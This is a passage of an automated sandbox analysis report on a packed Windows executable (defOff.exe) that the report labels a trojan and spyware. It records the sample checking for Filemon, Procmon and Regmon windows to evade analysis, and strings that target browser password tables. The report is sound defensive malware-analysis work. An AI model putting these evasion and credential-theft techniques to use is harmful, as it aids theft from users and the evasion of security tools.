              Source: file.exe, 00000000.00000003.2396279773.0000000005F7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401703033.00000000060B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2407077084.0000000005E95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2395461952.0000000005F6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2397698389.0000000005F8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401932097.0000000005F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2395268762.0000000005F6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2391670210.0000000005E95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2407417687.0000000005FD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2578530303.0000000006158000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2395363265.0000000005E96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2393698557.0000000005F4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404859985.00000000060DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2394440863.0000000005E98000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2395910573.0000000005EA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2397489866.0000000005F8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404569189.0000000005E95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2393794067.0000000005E97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392302170.0000000005EA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2394991478.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2429960341.000000000123C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2394714757.0000000005E9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2405517786.00000000060EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2395176480.0000000005E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392542007.0000000005F3A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392058693.0000000005FBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2396688720.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392217963.0000000005F3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2398044919.0000000006081000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2390377556.0000000005C92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2397384935.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2405995856.00000000060FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2397281740.0000000006061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2394900100.0000000006031000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2394179599.0000000005E98000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2429649674.00000000057C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2397177737.0000000005F77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2393120325.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401363584.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2397595038.0000000005E9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401041726.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2390446949.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404385626.0000000005FBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392622931.0000000005E93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404725974.0000000005FB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2393202161.0000000005E97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2394348782.0000000005FF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2402890710.0000000005FB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404091912.0000000005FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392381135.0000000005F3A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2391980356.0000000005F26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2400925176.0000000005F97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2404238417.0000000005E95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2400806071.0000000005EA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2397056031.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2392953293.0000000005F51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2396585426.0000000006051000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2391589497.0000000005F28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2402165199.0000000005E9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2398390798.0000000005E9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2393037758.0000000005EA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2406200803.0000000005E9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2401816861.0000000005E96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2429586016.000000000122F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2395810768.0000000006041000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.2578880208.0000000006416000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2402047813.0000000006095000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2396385334.0000000005E98000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9993148053278689
              Source: file.exeStatic PE information: Section: ygcbzohu ZLIB complexity 0.9946352744919624
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/61@7/6
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2186642598.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185915046.00000000057E4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214862937.00000000057E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2680 --field-trial-handle=2436,i,13883662097603284509,5735806010481988831,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1992,i,3177487743473689388,10012693031284183777,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2680 --field-trial-handle=2436,i,13883662097603284509,5735806010481988831,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1992,i,3177487743473689388,10012693031284183777,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1860096 > 1048576
              Source: file.exeStatic PE information: Raw size of ygcbzohu is bigger than: 0x100000 < 0x19c200
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000002.2578851659.0000000006412000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2447507809.00000000083B0000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.100000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ygcbzohu:EW;dmyrahus:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ygcbzohu:EW;dmyrahus:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1cf8af should be: 0x1c7a81
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: ygcbzohu
              Source: file.exeStatic PE information: section name: dmyrahus
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01228998 pushad ; iretd 0_3_01228999
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01248102 push eax; ret 0_3_01248111
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01248102 push eax; ret 0_3_01248111
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01248102 push eax; ret 0_3_01248111
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01248102 push eax; ret 0_3_01248111
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01248102 push eax; ret 0_3_01248111
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01243FEE pushfd ; iretd 0_3_01243FEF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01243FEE pushfd ; iretd 0_3_01243FEF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01243FEE pushfd ; iretd 0_3_01243FEF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01243FEE pushfd ; iretd 0_3_01243FEF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C2F6 push eax; ret 0_3_0124C351
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C2F6 push eax; ret 0_3_0124C351
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C2F6 push eax; ret 0_3_0124C351
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C2F6 push eax; ret 0_3_0124C351
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C2F6 push eax; ret 0_3_0124C351
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C356 push 680124C3h; ret 0_3_0124C36D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C356 push 680124C3h; ret 0_3_0124C36D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C356 push 680124C3h; ret 0_3_0124C36D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C356 push 680124C3h; ret 0_3_0124C36D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C356 push 680124C3h; ret 0_3_0124C36D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C352 push eax; ret 0_3_0124C355
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C352 push eax; ret 0_3_0124C355
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C352 push eax; ret 0_3_0124C355
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C352 push eax; ret 0_3_0124C355
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0124C352 push eax; ret 0_3_0124C355
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01248102 push eax; ret 0_3_01248111
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01248102 push eax; ret 0_3_01248111
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01248102 push eax; ret 0_3_01248111
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01248102 push eax; ret 0_3_01248111
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01248102 push eax; ret 0_3_01248111
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01243FEE pushfd ; iretd 0_3_01243FEF
              Source: file.exeStatic PE information: section name: entropy: 7.97443476819522
              Source: file.exeStatic PE information: section name: ygcbzohu entropy: 7.953752772757039

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
